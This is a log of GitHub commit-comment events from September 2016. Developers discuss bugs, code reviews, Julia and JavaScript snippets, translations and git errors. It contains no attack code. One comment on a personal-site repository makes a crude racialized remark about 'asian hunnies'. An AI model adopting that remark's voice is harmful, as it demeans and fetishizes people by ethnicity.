{"id":"4546024435","type":"CommitCommentEvent","actor":{"login":"Alx31"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18977336,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-11T15:41:20Z","updated_at":"2016-09-11T15:41:20Z","body":"it sure does, but u gotta build and flash first....basics rule, i also need sometimes to push changes before building to have a better look on what i did, in that case i do it on a test branch wich won't break others sync/build, in this case here; 6.0 branch is the stable one; oms is the testing one; i will have or Martin to merge these change to oms too to avoid conflicts..."}},"created_at":"2016-09-11T15:41:20Z"}
{"id":"4546027978","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":18977338,"position":null,"line":null,"path":null,"commit_id":"4ab1f23a12287105670d372505818a826a3e1035","created_at":"2016-09-11T15:43:32Z","updated_at":"2016-09-11T15:43:32Z","body":"Finally!!"}},"created_at":"2016-09-11T15:43:32Z"}
{"id":"4546031065","type":"CommitCommentEvent","actor":{"login":"marsivo"},"repo":{"name":"snap-ci/docs.snap-ci.com"},"payload":{"comment":{"id":18977339,"position":1,"line":1,"path":"data/packages.yml","commit_id":"1501fbd9e37184b8f196b30a62e3c3847761762a","created_at":"2016-09-11T15:45:32Z","updated_at":"2016-09-11T15:45:32Z","body":"#!/bin/bash\r\n"}},"created_at":"2016-09-11T15:45:32Z"}
{"id":"4546032097","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977340,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T15:46:13Z","updated_at":"2016-09-11T15:46:13Z","body":"This commit crashes engine.io testing so I need to fix that."}},"created_at":"2016-09-11T15:46:13Z"}
{"id":"4546035692","type":"CommitCommentEvent","actor":{"login":"abhisirohi"},"repo":{"name":"abhisirohi/CardGuessGame"},"payload":{"comment":{"id":18977343,"position":3,"line":3,"path":"README.md","commit_id":"3f7dad1bf4a9879c3add97243fd194ba5e0db407","created_at":"2016-09-11T15:48:29Z","updated_at":"2016-09-11T15:48:29Z","body":"."}},"created_at":"2016-09-11T15:48:29Z"}
{"id":"4546036155","type":"CommitCommentEvent","actor":{"login":"Svitleslav89"},"repo":{"name":"Svitleslav89/test"},"payload":{"comment":{"id":18977344,"position":null,"line":null,"path":null,"commit_id":"66576108bb3c9d67dae431e143d01eae3d3c962f","created_at":"2016-09-11T15:48:42Z","updated_at":"2016-09-11T15:48:42Z","body":"IT WORKS!"}},"created_at":"2016-09-11T15:48:42Z"}
{"id":"4546038781","type":"CommitCommentEvent","actor":{"login":"gdevenyi"},"repo":{"name":"BIC-MNI/libminc"},"payload":{"comment":{"id":18977348,"position":null,"line":null,"path":null,"commit_id":"464f006e1d184eb311671e16bd71442211315283","created_at":"2016-09-11T15:50:17Z","updated_at":"2016-09-11T15:50:17Z","body":"I have some nrrds (labels and images) I can share, interested?"}},"created_at":"2016-09-11T15:50:17Z"}
{"id":"4546039269","type":"CommitCommentEvent","actor":{"login":"inter-action"},"repo":{"name":"inter-action/algorithms_of_the_intelligent_web"},"payload":{"comment":{"id":18977350,"position":14,"line":25,"path":"src/main/scala/ch04/models.scala","commit_id":"be1c7a023c5343598855114015da49e69f65c108","created_at":"2016-09-11T15:50:34Z","updated_at":"2016-09-11T15:50:34Z","body":"this is important!"}},"created_at":"2016-09-11T15:50:34Z"}
{"id":"4546040231","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18977352,"position":null,"line":null,"path":null,"commit_id":"9ff9337a7558b00c0c2fea26f3f507b0bb413539","created_at":"2016-09-11T15:51:11Z","updated_at":"2016-09-11T15:51:11Z","body":"@kwonn @bangwu93 \r\nThis is for LO-MergeConflicts. Everyone needs to pull this before pushing any changes."}},"created_at":"2016-09-11T15:51:11Z"}
{"id":"4546040238","type":"CommitCommentEvent","actor":{"login":"mintty"},"repo":{"name":"saitoha/mintty-sixel"},"payload":{"comment":{"id":18977353,"position":null,"line":null,"path":null,"commit_id":"959418bbdc8d683f27d0fcf00b2ff7c6596baa89","created_at":"2016-09-11T15:51:11Z","updated_at":"2016-09-11T15:51:11Z","body":"That explains some weird effects I had when pasting into an editor...\r\nWe could use U+FFFC OBJECT REPLACEMENT CHARACTER instead which is specifically intended for such cases in Unicode, I think. But it might be more surprising, and only work in UTF-8.\r\nIf I apply the second patch part but not the first, the image is represented as a block of SPACE in the paste buffer, which may actually be desirable.\r\nBy the way, could the choice SIXELCH = 1 have other side effects anywhere because it's Ctrl+A? Maybe we should define SIXELCH = 0xFFFC in the first place, and then also not need this patch? Unsure..."}},"created_at":"2016-09-11T15:51:11Z"}
{"id":"4546040528","type":"CommitCommentEvent","actor":{"login":"pedro-mendonca"},"repo":{"name":"rpetrich/Localization"},"payload":{"comment":{"id":18977354,"position":null,"line":null,"path":null,"commit_id":"42f72dfb475712c94923e08083488ed54d1bbcd0","created_at":"2016-09-11T15:51:22Z","updated_at":"2016-09-11T15:51:22Z","body":"Hi @autopear,\r\n\r\nThis doesn't look right:\r\n\"Single Press and Hold\" -> \"Touch twice and hold on fingerprint sensor\"\r\nSigle press and hold and touch twice doesn't look the same."}},"created_at":"2016-09-11T15:51:22Z"}
{"id":"4546040896","type":"CommitCommentEvent","actor":{"login":"kpeckett"},"repo":{"name":"CatBlock/website"},"payload":{"comment":{"id":18977355,"position":17,"line":10,"path":"cats.js","commit_id":"e0744bcede387d1c3741ed0db833d32d37f23d1c","created_at":"2016-09-11T15:51:38Z","updated_at":"2016-09-11T15:51:38Z","body":"Are we not making the code work on Safari then?"}},"created_at":"2016-09-11T15:51:38Z"}
{"id":"4546042030","type":"CommitCommentEvent","actor":{"login":"tomasko126"},"repo":{"name":"CatBlock/website"},"payload":{"comment":{"id":18977356,"position":8,"line":8,"path":"cats.js","commit_id":"e0744bcede387d1c3741ed0db833d32d37f23d1c","created_at":"2016-09-11T15:52:20Z","updated_at":"2016-09-11T15:52:20Z","body":"@kpeckett Good point!"}},"created_at":"2016-09-11T15:52:20Z"}
{"id":"4546042797","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977358,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T15:52:48Z","updated_at":"2016-09-11T15:52:48Z","body":"What did you mean?\r\n@JoinRajuncraftNow"}},"created_at":"2016-09-11T15:52:48Z"}
{"id":"4546045776","type":"CommitCommentEvent","actor":{"login":"tomasko126"},"repo":{"name":"CatBlock/website"},"payload":{"comment":{"id":18977360,"position":17,"line":10,"path":"cats.js","commit_id":"e0744bcede387d1c3741ed0db833d32d37f23d1c","created_at":"2016-09-11T15:54:34Z","updated_at":"2016-09-11T15:54:34Z","body":"@kpeckett No, because I want users to have automatic updates (hence Edge is not supported too). I am thinking about including Firefox as a supported browser, but approval from AMO editors may take up to 2 weeks."}},"created_at":"2016-09-11T15:54:34Z"}
{"id":"4546046195","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula-ev/Formicula"},"payload":{"comment":{"id":18977362,"position":null,"line":null,"path":null,"commit_id":"4ab908cc232c75d61b6aa8cd7c0ba8ecd45522c6","created_at":"2016-09-11T15:54:53Z","updated_at":"2016-09-11T15:54:53Z","body":"@craigh looks like a core issue?\r\n\r\n@marcpare4 which core version is that?\r\n"}},"created_at":"2016-09-11T15:54:53Z"}
{"id":"4546046553","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18977363,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T15:55:07Z","updated_at":"2016-09-11T15:55:07Z","body":"No problem. Hmm, that sounds like your upgrade is incomplete. I had some\nproblems yesterday with my upgrade here. So some packages were mixed ( 2.3\npackages with 2.1 ).\nCould you refresh apt ( sudo apt-get update ) and do a upgrade again?\n\nThanks\n\nMit freundlichen Grüßen/With kind regards\n- Thomas Karl Pietrowski\n"}},"created_at":"2016-09-11T15:55:07Z"}
{"id":"4546047173","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18977364,"position":null,"line":null,"path":null,"commit_id":"816015c7be26e54fb508c5f5f725b28067747100","created_at":"2016-09-11T15:55:29Z","updated_at":"2016-09-11T15:55:29Z","body":"es wurden auch alle strings entfernt\r\naber nur in string.xml \r\ndie sprachen muss mann dann noch anpassen\r\n\r\nund bei alertReceiver da wusste ich nicht was ich kommentieren sollte\r\nalso schau dir allgemein deine nochmal an\r\n\r\nund ich hab das calendar layout geändert und jetzt passt alles und es hängt auch nicht mehr"}},"created_at":"2016-09-11T15:55:29Z"}
{"id":"4546049656","type":"CommitCommentEvent","actor":{"login":"kaneawk"},"repo":{"name":"kaneawk/oneinstack"},"payload":{"comment":{"id":18977368,"position":null,"line":null,"path":null,"commit_id":"b0cfc45c619809761b7b1c1b9b06dc3b274b25d4","created_at":"2016-09-11T15:57:08Z","updated_at":"2016-09-11T15:57:08Z","body":"You can cherry pick it."}},"created_at":"2016-09-11T15:57:08Z"}
{"id":"4546052700","type":"CommitCommentEvent","actor":{"login":"bijitsony"},"repo":{"name":"devngc/Weather-Wall"},"payload":{"comment":{"id":18977369,"position":null,"line":null,"path":null,"commit_id":"6cf714d506a8125f58f96a195f4192546ef7af31","created_at":"2016-09-11T15:59:03Z","updated_at":"2016-09-11T15:59:03Z","body":"Good thing that you added, I almost forgot it! Thanks"}},"created_at":"2016-09-11T15:59:03Z"}
{"id":"4546054446","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977371,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T16:00:11Z","updated_at":"2016-09-11T16:00:11Z","body":"Yeah, I guess this breaks compatibility with whatever uses `uws` :) "}},"created_at":"2016-09-11T16:00:11Z"}
{"id":"4546054968","type":"CommitCommentEvent","actor":{"login":"amalzouari"},"repo":{"name":"amalzouari/helloworld"},"payload":{"comment":{"id":18977372,"position":null,"line":null,"path":null,"commit_id":"5f551b76dcb560c72a863e584399de7ffec48022","created_at":"2016-09-11T16:00:22Z","updated_at":"2016-09-11T16:00:22Z","body":"# hey i have changed the code"}},"created_at":"2016-09-11T16:00:22Z"}
{"id":"4546055308","type":"CommitCommentEvent","actor":{"login":"amalzouari"},"repo":{"name":"amalzouari/helloworld"},"payload":{"comment":{"id":18977373,"position":null,"line":null,"path":null,"commit_id":"5f551b76dcb560c72a863e584399de7ffec48022","created_at":"2016-09-11T16:00:33Z","updated_at":"2016-09-11T16:00:33Z","body":"sdssdsds"}},"created_at":"2016-09-11T16:00:33Z"}
{"id":"4546056817","type":"CommitCommentEvent","actor":{"login":"lex3a"},"repo":{"name":"Rinnegatamante/rinCheat"},"payload":{"comment":{"id":18977376,"position":null,"line":null,"path":null,"commit_id":"c3e59753ea90693cf1767327518751feb250d9f1","created_at":"2016-09-11T16:01:27Z","updated_at":"2016-09-11T16:01:27Z","body":"What is GPU crossbar clock ? "}},"created_at":"2016-09-11T16:01:27Z"}
{"id":"4546061861","type":"CommitCommentEvent","actor":{"login":"snaphuman"},"repo":{"name":"ecos-codeaholics/factory-of-procedures-front"},"payload":{"comment":{"id":18977381,"position":61,"line":61,"path":"src/auth/signup.component.ts","commit_id":"6476f404b82d26b7815ddcf6669c0cd898808e0e","created_at":"2016-09-11T16:04:10Z","updated_at":"2016-09-11T16:04:10Z","body":"Excellent! Now we have file validation (y)\r\n@davidfms22 ¿What do you think about implementing this functionality as a shared service that can be applied on desired components?"}},"created_at":"2016-09-11T16:04:10Z"}
{"id":"4546064759","type":"CommitCommentEvent","actor":{"login":"yooncobra"},"repo":{"name":"yooncobra/yooncobra.github.com"},"payload":{"comment":{"id":18977385,"position":null,"line":null,"path":null,"commit_id":"8c5128405814d913a933157fc17a41176aadbdf3","created_at":"2016-09-11T16:05:51Z","updated_at":"2016-09-11T16:05:51Z","body":"error: src refspec origin does not match any. \r\nerror: failed to push some refs to 'master'\r\n위의 문제로 에러 발생 후 http://noritersand.tistory.com/189를 참조 후 \r\n아무 파일이나 생성 -> 커밋 -> 푸싱으로 간단하게 해결할 수 있었지만 왜 그런지 아직 모름\r\n$ touch readme\r\n$ git add .\r\n$ git commit -m \"init\""}},"created_at":"2016-09-11T16:05:51Z"}
{"id":"4546065910","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"gitpython-developers/GitPython"},"payload":{"comment":{"id":18977389,"position":22,"line":113,"path":"git/test/test_repo.py","commit_id":"2ba897b12024fd20681b7c2f1b40bdbbccd5df59","created_at":"2016-09-11T16:06:35Z","updated_at":"2016-09-11T16:06:35Z","body":"Just checking - was the merge of two tests intensional?"}},"created_at":"2016-09-11T16:06:35Z"}
{"id":"4546067272","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977393,"position":36,"line":36,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T16:07:24Z","updated_at":"2016-09-11T16:07:24Z","body":"There is no way to provide as many ways to call `matrix` as R can, since in julia keywords arguments are treated differently with R.\r\nMy suggestion is provide a version without keywords and a version with all being keywords. Functions with no keywords is usually faster than those with them. \r\n```\r\nfunction matrix(x::AbstractVector, nrow::Integer, ncol::Integer, byrow::Bool = false)\r\n    length(x) % nrow == 0 && length(x) == nrow*ncol || throw(DimensionMismatch(\"Lenth of `x` is not a multiple of `nrow` and `ncol`.\"))\r\n    if byrow\r\n        return reshape(float(x), (Int(nrow), Int(ncol)))\r\n    else\r\n        return reshape(float(x), (Int(nrow), Int(ncol)))'\r\n    end\r\nend\r\n\r\nmatrix(x::AbstractVector; nrow::Integer=length(x), ncol::Integer=div(length(x), nrow), byrow::Bool = false)=matrix(x, nrow, ncol, byrow)\r\n```\r\n\r\n"}},"created_at":"2016-09-11T16:07:24Z"}
{"id":"4546070228","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula-ev/Formicula"},"payload":{"comment":{"id":18977394,"position":null,"line":null,"path":null,"commit_id":"4ab908cc232c75d61b6aa8cd7c0ba8ecd45522c6","created_at":"2016-09-11T16:09:18Z","updated_at":"2016-09-11T16:09:18Z","body":"corrected [here](https://github.com/zikula/core/commit/19679f2ec3801779c3db34b9ddf50eec03e1ada4) but that means it is still throwing an exception"}},"created_at":"2016-09-11T16:09:18Z"}
{"id":"4546070565","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977396,"position":27,"line":27,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T16:09:33Z","updated_at":"2016-09-11T16:09:33Z","body":"`function f{T<:Real}(x::T)` is equivalent with `f(x::Real)`.\r\nUsing"}},"created_at":"2016-09-11T16:09:33Z"}
{"id":"4546070896","type":"CommitCommentEvent","actor":{"login":"TWSSYesterday"},"repo":{"name":"sgtcaze/NametagEdit"},"payload":{"comment":{"id":18977398,"position":null,"line":null,"path":null,"commit_id":"b5919275d88a0d5c17ac0255a57d6a180dbfcf41","created_at":"2016-09-11T16:09:45Z","updated_at":"2016-09-11T16:09:45Z","body":"RIP :P"}},"created_at":"2016-09-11T16:09:45Z"}
{"id":"4546071773","type":"CommitCommentEvent","actor":{"login":"pedro-mendonca"},"repo":{"name":"rpetrich/Localization"},"payload":{"comment":{"id":18977399,"position":null,"line":null,"path":null,"commit_id":"42f72dfb475712c94923e08083488ed54d1bbcd0","created_at":"2016-09-11T16:10:16Z","updated_at":"2016-09-11T16:10:16Z","body":"It's a bit odd by understand it now, \"Single Press and Hold\" are two presses, the second is a hold.\r\nThe description \"Touch twice and hold...\" looks a bit like three touches, being a \"hold\" the third one.\r\nBoth are valid, but the aproach to define both doesn seem coherent."}},"created_at":"2016-09-11T16:10:16Z"}
{"id":"4546072705","type":"CommitCommentEvent","actor":{"login":"Fanolian"},"repo":{"name":"piroor/treestyletab"},"payload":{"comment":{"id":18977400,"position":2,"line":2,"path":"ISSUE_TEMPLATE.md","commit_id":"16a400c1e14725fe991352e0fac22a512abdec9e","created_at":"2016-09-11T16:10:51Z","updated_at":"2016-09-11T16:10:51Z","body":"Typo: guidline -> guideline"}},"created_at":"2016-09-11T16:10:51Z"}
{"id":"4546077403","type":"CommitCommentEvent","actor":{"login":"nurizza"},"repo":{"name":"nurizza/PendaftaranLKSsekolah"},"payload":{"comment":{"id":18977405,"position":2,"line":2,"path":"README.md","commit_id":"5298d82f2d49bd9b08371524d55d5ebfdd81a09f","created_at":"2016-09-11T16:13:58Z","updated_at":"2016-09-11T16:13:58Z","body":"Saya membuat for pendaftaran LKS SMK tingkat sekolah\r\nuntuk pengisisan nama saya menggunakan edittextview\r\nuntuk kelas menggunakan spinner\r\nuntuk jeniskelamin menggunakan radiobutton\r\nuntuk bidang yang diikuti menggunakan checkbox (bisa memilih lebih dari satu)"}},"created_at":"2016-09-11T16:13:58Z"}
{"id":"4546079096","type":"CommitCommentEvent","actor":{"login":"adamwage"},"repo":{"name":"adamwage/6.4-chat-app"},"payload":{"comment":{"id":18977407,"position":null,"line":null,"path":null,"commit_id":"0d15c66fea0fb0cee04c975cfa21056dd056935c","created_at":"2016-09-11T16:15:10Z","updated_at":"2016-09-11T16:15:10Z","body":"I'm keeping it vanilla JS, I was able to get everything to work. My misunderstanding was that the render() was going to happen in my tiny-tiny url So I was expecting to be chatting  there. I just realized that the tiny-tiny server was just to hold the data and I'd be posting/getting from the server :P @cogKnitter "}},"created_at":"2016-09-11T16:15:10Z"}
{"id":"4546082960","type":"CommitCommentEvent","actor":{"login":"Rinnegatamante"},"repo":{"name":"Rinnegatamante/rinCheat"},"payload":{"comment":{"id":18977408,"position":null,"line":null,"path":null,"commit_id":"c3e59753ea90693cf1767327518751feb250d9f1","created_at":"2016-09-11T16:17:36Z","updated_at":"2016-09-11T16:17:36Z","body":"What the function name says, clock of the gpu crossbar."}},"created_at":"2016-09-11T16:17:36Z"}
{"id":"4546083130","type":"CommitCommentEvent","actor":{"login":"conan513"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977409,"position":null,"line":null,"path":null,"commit_id":"fb1f98ad090b63ea1fad390e42896b78e43fd804","created_at":"2016-09-11T16:17:42Z","updated_at":"2016-09-11T16:17:42Z","body":"great job, but sometimes if you combinate double jump with fel rush the character stuck in the air\r\ncan reproduce this bug looks totally random\r\nsometimes working and sometimes it's stuck in mid air and can't jump again"}},"created_at":"2016-09-11T16:17:42Z"}
{"id":"4546087257","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977410,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T16:20:25Z","updated_at":"2016-09-11T16:20:25Z","body":"It does pass Engine.IO and Primus tests (as ws substitute) now though. And since it is 0.9.0 it's up to people to update. But I will do some testing to see if I can get better perf with Node.js Buffers.."}},"created_at":"2016-09-11T16:20:25Z"}
{"id":"4546088236","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"DaryaKostenko/.NET"},"payload":{"comment":{"id":18977411,"position":13,"line":13,"path":"Penguin/Penguin/Program.cs","commit_id":"0d7df94d8b99f15e310fa73db324dc438591b81b","created_at":"2016-09-11T16:21:05Z","updated_at":"2016-09-11T16:21:05Z","body":"Здесь можно испольщовать коллекцию Dictionary, но вобщем-то и так нормально, но с Dictionary рекомендую познакомиться."}},"created_at":"2016-09-11T16:21:05Z"}
{"id":"4546088914","type":"CommitCommentEvent","actor":{"login":"barischj"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":18977412,"position":58,"line":0,"path":"classcloud.py","commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-11T16:21:30Z","updated_at":"2016-09-11T16:21:30Z","body":"Why use dicts in the array when each dict is always size 1?"}},"created_at":"2016-09-11T16:21:30Z"}
{"id":"4546089354","type":"CommitCommentEvent","actor":{"login":"barischj"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":18977413,"position":59,"line":0,"path":"classcloud.py","commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-11T16:21:48Z","updated_at":"2016-09-11T16:21:48Z","body":"Why ignoring other elements?"}},"created_at":"2016-09-11T16:21:48Z"}
{"id":"4546090066","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"jscho13/personal_site"},"payload":{"comment":{"id":18977415,"position":null,"line":null,"path":null,"commit_id":"e719f7cb05b7e4373a03a8e59ae5fb449f5b6c2f","created_at":"2016-09-11T16:22:18Z","updated_at":"2016-09-11T16:22:18Z","body":"mmmm so clean.\r\n\r\naside from rock climbing you can also spot asian hunnies at art galleries. more gold mines"}},"created_at":"2016-09-11T16:22:18Z"}
{"id":"4546090315","type":"CommitCommentEvent","actor":{"login":"jvillagarcia"},"repo":{"name":"jvillagarcia/hello-world"},"payload":{"comment":{"id":18977416,"position":null,"line":null,"path":null,"commit_id":"0533c1ef2c097d52ec760d584aff58ddb068d7be","created_at":"2016-09-11T16:22:27Z","updated_at":"2016-09-11T16:22:27Z","body":"change 1"}},"created_at":"2016-09-11T16:22:27Z"}
{"id":"4546091367","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977417,"position":null,"line":null,"path":null,"commit_id":"fb1f98ad090b63ea1fad390e42896b78e43fd804","created_at":"2016-09-11T16:23:08Z","updated_at":"2016-09-11T16:23:08Z","body":"Fel Rush is not implemented yet, don't see a reason for bugs here."}},"created_at":"2016-09-11T16:23:08Z"}
{"id":"4546095825","type":"CommitCommentEvent","actor":{"login":"sidsukana"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":18977418,"position":null,"line":null,"path":null,"commit_id":"6b879ef258d8b072ae4dd6de74eb489af7e1de15","created_at":"2016-09-11T16:26:00Z","updated_at":"2016-09-11T16:26:00Z","body":"Great typo in 4d92fcd891c6fab605ff6a95ae54e2a987e330b8"}},"created_at":"2016-09-11T16:26:00Z"}
{"id":"4546096638","type":"CommitCommentEvent","actor":{"login":"caww2015"},"repo":{"name":"d4rken/sdmaid-public"},"payload":{"comment":{"id":18977419,"position":null,"line":null,"path":null,"commit_id":"2dbf4f630103dc9fa86bb5da71a4e4f0d591de21","created_at":"2016-09-11T16:26:33Z","updated_at":"2016-09-11T16:26:33Z","body":"What do I do next"}},"created_at":"2016-09-11T16:26:33Z"}
{"id":"4546097216","type":"CommitCommentEvent","actor":{"login":"posva"},"repo":{"name":"znck/rollup-plugin-vue"},"payload":{"comment":{"id":18977420,"position":null,"line":null,"path":null,"commit_id":"beb75a47409c3b9e0c49c3249763516366295c82","created_at":"2016-09-11T16:26:59Z","updated_at":"2016-09-11T16:26:59Z","body":"Oh, thank you 😄 "}},"created_at":"2016-09-11T16:26:59Z"}
{"id":"4546097484","type":"CommitCommentEvent","actor":{"login":"billhibazzz"},"repo":{"name":"jsfiddle/jsfiddle-issues"},"payload":{"comment":{"id":18977421,"position":null,"line":null,"path":null,"commit_id":"532355d45de5ddd73f23c74126ba37bfabf7ebce","created_at":"2016-09-11T16:27:10Z","updated_at":"2016-09-11T16:27:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BhUVNnKw&#x2F;12-signing-in-with-github-stackoverflow\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Signing in with Github &#x2F; StackOverflow</a>"}},"created_at":"2016-09-11T16:27:10Z"}
{"id":"4546097577","type":"CommitCommentEvent","actor":{"login":"billhibazzz"},"repo":{"name":"jsfiddle/jsfiddle-issues"},"payload":{"comment":{"id":18977423,"position":null,"line":null,"path":null,"commit_id":"ef0f234e44e5a6d6791c09e672364fdf9518a31a","created_at":"2016-09-11T16:27:13Z","updated_at":"2016-09-11T16:27:13Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BhUVNnKw&#x2F;12-signing-in-with-github-stackoverflow\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Signing in with Github &#x2F; StackOverflow</a>"}},"created_at":"2016-09-11T16:27:13Z"}
{"id":"4546097662","type":"CommitCommentEvent","actor":{"login":"billhibazzz"},"repo":{"name":"jsfiddle/jsfiddle-issues"},"payload":{"comment":{"id":18977424,"position":null,"line":null,"path":null,"commit_id":"7ac6c0af6543db4cc7fb4984140275a57b3c2493","created_at":"2016-09-11T16:27:17Z","updated_at":"2016-09-11T16:27:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BhUVNnKw&#x2F;12-signing-in-with-github-stackoverflow\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Signing in with Github &#x2F; StackOverflow</a>"}},"created_at":"2016-09-11T16:27:17Z"}
{"id":"4546097755","type":"CommitCommentEvent","actor":{"login":"billhibazzz"},"repo":{"name":"jsfiddle/jsfiddle-issues"},"payload":{"comment":{"id":18977425,"position":null,"line":null,"path":null,"commit_id":"ef0f234e44e5a6d6791c09e672364fdf9518a31a","created_at":"2016-09-11T16:27:21Z","updated_at":"2016-09-11T16:27:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BhUVNnKw&#x2F;12-signing-in-with-github-stackoverflow\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Signing in with Github &#x2F; StackOverflow</a>"}},"created_at":"2016-09-11T16:27:21Z"}
{"id":"4546098786","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977427,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T16:28:07Z","updated_at":"2016-09-11T16:28:07Z","body":"This is doesn't look correct. \r\n```\r\nreshape(float(x), (Int(ncol), Int(nrow)))'\r\n```\r\nTranspose of a matrix is inefficient. Maybe we can do \r\n```\r\nres=similar(x, nrow, ncol)\r\nnx = length(x)\r\nfor i in eachindex(res)\r\n    res[i]= x[ div(i,  nx) ]\r\nend\r\n```"}},"created_at":"2016-09-11T16:28:07Z"}
{"id":"4546099994","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977428,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T16:28:54Z","updated_at":"2016-09-11T16:28:54Z","body":"Buffer.from(message) is 700 echoes/ms while message itself it 1000 echoes/ms. So even with Buffer.from it does improve perf quite a bit from 450 echoes/ms."}},"created_at":"2016-09-11T16:28:54Z"}
{"id":"4546101974","type":"CommitCommentEvent","actor":{"login":"conan513"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977433,"position":null,"line":null,"path":null,"commit_id":"fb1f98ad090b63ea1fad390e42896b78e43fd804","created_at":"2016-09-11T16:30:17Z","updated_at":"2016-09-11T16:30:17Z","body":"oh sorry I forget that :D"}},"created_at":"2016-09-11T16:30:17Z"}
{"id":"4546102098","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977434,"position":null,"line":null,"path":null,"commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T16:30:22Z","updated_at":"2016-09-11T16:30:22Z","body":"would this also work with objects?\n\n\nOn Sun, Sep 11, 2016 at 10:22 AM, Ricky C. <notifications@github.com> wrote:\n\n> Here's some sample code with arrays :)\n>\n> var numbers = [];numbers.push(1); // now your array is [1]numbers.push(2); // now your array contains [1,2]\n>\n> You can push any data type into an array. Hope that helps!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/b02a62460b7ee852ec6a829e2e9971d28ecdd136#commitcomment-18977116>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQldnaY3jeN_M877Lvs8hiG1Fdo9npO8ks5qpA6agaJpZM4J6AmM>\n> .\n>\n\n\n\n-- \n\nErin Lee\n"}},"created_at":"2016-09-11T16:30:22Z"}
